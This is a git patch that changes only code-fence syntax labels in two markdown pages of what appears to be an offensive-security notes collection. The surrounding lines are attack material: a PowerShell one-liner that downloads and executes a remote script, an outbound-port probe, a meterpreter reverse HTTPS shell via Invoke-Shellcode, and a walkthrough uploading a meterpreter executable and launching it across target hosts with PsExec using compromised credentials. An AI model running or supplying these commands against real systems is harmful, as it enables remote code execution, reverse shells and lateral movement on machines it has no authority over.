From 4b51947dd8cd25949bf4ebb805f2032d62a5d861 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 2 Dec 2013 18:45:25 -0600 Subject: [PATCH] Use syntax highlighting Removes non-existen PowerShell syntax support. Adds bash syntax for UAC writeup. --- windows/powershell.md | 8 ++++---- windows/uac.md | 10 +++++----- 2 files changed, 9 insertions(+), 9 deletions(-) diff --git a/windows/powershell.md b/windows/powershell.md index f9836a1..ff4a905 100644 --- a/windows/powershell.md +++ b/windows/powershell.md @@ -5,25 +5,25 @@ One liners **Download and Execute Remote Powershell Script** -```PowerShell +``` iex (New-Object Net.WebClient).DownloadString("http://host/file.txt") ``` **Download and Save File** -```PowerShell +``` (new-object System.Net.WebClient).Downloadfile('http://host/file.exe', 'file.exe') ``` **Enumerate Allowed Outbound Ports 1-1024** -```PowerShell +``` $ErrorActionPreference = "silentlycontinue"; 1..1024 | % {$req = [System.Net.WebRequest]::Create("http://letmeoutofyour.net:$_"); $req.Timeout = 600; $resp = $req.GetResponse(); $respstream = $resp.GetResponseStream(); $stream = new-object System.IO.StreamReader $respstream; $out = $stream.ReadToEnd(); if ($out.trim() -eq "w00tw00t"){echo "$_ Allowed out"}} ``` **Reverse Shell Using [PowerSploit's Invoke-Shellcode](https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1)** -```PowerShell +``` Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 -Lport 443 -Force ``` \ No newline at end of file diff --git a/windows/uac.md b/windows/uac.md index 25fd6ac..719027e 100644 --- a/windows/uac.md +++ b/windows/uac.md @@ -6,7 +6,7 @@ For this example, lets just assume that you have gotten a meterpreter shell on a For starters we can turn to PsExec. PsExec will allow us to run commands against a remote machine, and comes with a handly little option, -h. -``` +```bash -h If the target system is Vista or higher, has the process run with the account's elevated token, if available. ``` @@ -15,20 +15,20 @@ Seems handy for what were planning to do. Before we dive in though, I want to qu Continuing on, the first step that we want to do is upload a copy of PsExec.exe and an encoded copy of a malicious meterepreter exe (see the Veil project for details on how to do this) up to the server. To do this, we could do: -``` +```bash upload *path to meterpreter exe* \\users\\*target user here*\\metpr.exe upload *path to PsExec.exe* \\users\\*target user here*\\PsExec.exe ``` The next step to do is to gather a list of target IP addresses that you would like to try using your exploited user's authentication credentials against. Once you have done this, save it to a file (targets.txt in our example) and upload it to Box0. -``` +```bash upload *path to targets.txt* \\users\\*target user here*\\targets.txt ``` We then can run PsExec.exe as follows: -``` +```bash PsExec.exe @targets.txt -accepteula -c -f -h -d metr.exe ``` @@ -47,7 +47,7 @@ We do have a slight problem though. Due to something called the double hop issue We now need to find another host where our user is running with a primary token so that we can escalate privileges on Box0. To do this, we will use PsLoggedon.exe from same PsTools suite that PsExec.exe comes from. Taking the targets.txt file that we created, here is the command to pass through the credentials of our currently compromized user and find out where else he/she is logged in: -``` +```bash for /F %i in (targets.txt) do @PsLoggedon.exe \\%i 2>NUL | find "*compromized user's name goes here*" >NUL && echo %i ```